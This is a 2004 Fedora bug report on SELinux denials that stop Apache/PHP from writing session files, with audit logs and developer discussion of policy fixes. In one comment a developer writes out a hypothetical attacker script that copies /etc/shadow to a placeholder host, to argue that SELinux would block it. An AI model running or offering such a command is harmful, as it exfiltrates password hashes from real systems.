Bug 121063 - php session management in enforcing mode
Summary: php session management in enforcing mode
Status: CLOSED CURRENTRELEASE
Alias: None
Product: Fedora
Classification: Fedora
Component: php (Show other bugs)
(Show other bugs)
Version: rawhide
Hardware: All Linux
medium
medium
Target Milestone: ---
Assignee: Joe Orton
QA Contact: David Lawrence
URL:
Whiteboard:
Keywords:
Depends On:
Blocks:
TreeView+ depends on / blocked
 
Reported: 2004-04-16 17:01 UTC by Tim Waugh
Modified: 2007-11-30 22:10 UTC (History)
2 users (show)

Fixed In Version:
Doc Type: Bug Fix
Doc Text:
Story Points: ---
Clone Of:
Environment:
Last Closed: 2004-11-22 11:59:07 UTC
Type: ---
Regression: ---
Mount Type: ---
Documentation: ---
CRM:
Verified Versions:
Category: ---
oVirt Team: ---
RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: ---


Attachments (Terms of Use)

Description Tim Waugh 2004-04-16 17:01:27 UTC
Description of problem:
I tried logging into a php application running on an enforcing rawhide
installation, but it failed.  Here is the log from trying it after
'setenforce 0':

audit(1082134568.528:0): avc:  denied  { write } for  pid=23927
exe=/usr/sbin/httpd name=session dev=hda2 ino=1017200
scontext=root:system_r:httpd_t tcontext=system_u:object_r:var_lib_t
tclass=dir
audit(1082134568.528:0): avc:  denied  { add_name } for  pid=23927
exe=/usr/sbin/httpd name=sess_9a0cc65957c33ae245fefb45e53cdfd7
scontext=root:system_r:httpd_t tcontext=system_u:object_r:var_lib_t
tclass=dir
audit(1082134568.528:0): avc:  denied  { create } for  pid=23927
exe=/usr/sbin/httpd name=sess_9a0cc65957c33ae245fefb45e53cdfd7
scontext=root:system_r:httpd_t tcontext=root:object_r:var_lib_t
tclass=file
audit(1082134568.544:0): avc:  denied  { write } for  pid=23927
exe=/usr/sbin/httpd
path=/var/lib/php/session/sess_9a0cc65957c33ae245fefb45e53cdfd7
dev=hda2 ino=1017205 scontext=root:system_r:httpd_t
tcontext=root:object_r:var_lib_t tclass=file
audit(1082134570.096:0): avc:  denied  { append } for  pid=23921
exe=/usr/sbin/httpd name=1056296843_1547169690.lock dev=hda7
ino=738596 scontext=root:system_r:httpd_t
tcontext=root:object_r:httpd_sys_content_t tclass=file
audit(1082134570.135:0): avc:  denied  { write } for  pid=23921
exe=/usr/sbin/httpd name=.users dev=hda7 ino=738590
scontext=root:system_r:httpd_t
tcontext=root:object_r:httpd_sys_content_t tclass=dir
audit(1082134570.135:0): avc:  denied  { add_name } for  pid=23921
exe=/usr/sbin/httpd name=1056296843_1547169690.0
scontext=root:system_r:httpd_t
tcontext=root:object_r:httpd_sys_content_t tclass=dir
audit(1082134570.135:0): avc:  denied  { create } for  pid=23921
exe=/usr/sbin/httpd name=1056296843_1547169690.0
scontext=root:system_r:httpd_t
tcontext=root:object_r:httpd_sys_content_t tclass=file
audit(1082134570.198:0): avc:  denied  { write } for  pid=23921
exe=/usr/sbin/httpd
path=/var/www/html/albums/.users/1056296843_1547169690.0 dev=hda7
ino=1114181 scontext=root:system_r:httpd_t
tcontext=root:object_r:httpd_sys_content_t tclass=file
audit(1082134570.200:0): avc:  denied  { remove_name } for  pid=23921
exe=/usr/sbin/httpd name=1056296843_1547169690 dev=hda7 ino=738595
scontext=root:system_r:httpd_t
tcontext=root:object_r:httpd_sys_content_t tclass=dir
audit(1082134570.200:0): avc:  denied  { rename } for  pid=23921
exe=/usr/sbin/httpd name=1056296843_1547169690 dev=hda7 ino=738595
scontext=root:system_r:httpd_t
tcontext=root:object_r:httpd_sys_content_t tclass=file
audit(1082134570.200:0): avc:  denied  { unlink } for  pid=23921
exe=/usr/sbin/httpd name=1056296843_1547169690.bak dev=hda7 ino=738597
scontext=root:system_r:httpd_t
tcontext=root:object_r:httpd_sys_content_t tclass=file

Version-Release number of selected component (if applicable):
policy-1.11.2-8
httpd-2.0.49-2
php-4.3.4-11

How reproducible:
100%

Steps to Reproduce:
1. Install gallery from gallery.sf.net, set up users (I can make a
ready-made tarball available)
2. setenforce 1
2. Try to log in

Looks like /var/lib/php needs a different file context.

Comment 1 Joe Orton 2004-04-16 19:38:40 UTC
Is SELinux going to get in the way even for the "unprivileged" httpd
children running setuid apache?  This is painful.

httpd, when running as the 'apache' user, needs to have permissions to
do whatever it likes in /var/lib/php/session/.  This can be added to
the policy.

This particular webapp also needs write access to /var/www/html/, but
that's not something which can go in the policy; in general, you
*don't* want the web server to have write acccess to the web content.
 Except when you do.  So this is something the server admin needs to
configure, I guess.


Comment 2 Joe Orton 2004-11-22 11:59:07 UTC
The /var/lib/php/session policy was changed, so this bug can be closed. 
However, gallery is still a long way from working since it uses system() in the
install scripts.

Comment 3 Daniel Walsh 2004-11-22 14:54:03 UTC
Joe,

How can I test and fix this?

Dan

Comment 4 Joe Orton 2004-11-22 15:01:06 UTC
Unless you want to allow httpd to exec /bin/bash in the default policy
(which I would guess defeats the point of having SELinux on by
default) you can't fix this.

Comment 5 Daniel Walsh 2004-11-22 15:04:18 UTC
No allowing it to exec bash does not necessarily open you to a great
deal of problems.  You would still be running in the httpd context. 
So even if a hacker broke into apache and got it to run a shell 
#!/bin/sh
scp /etc/shadow MYHOST

It would fail because httpd_t is not allowed to access /etc/shadow.




Note You need to log in before you can comment on or make changes to this bug.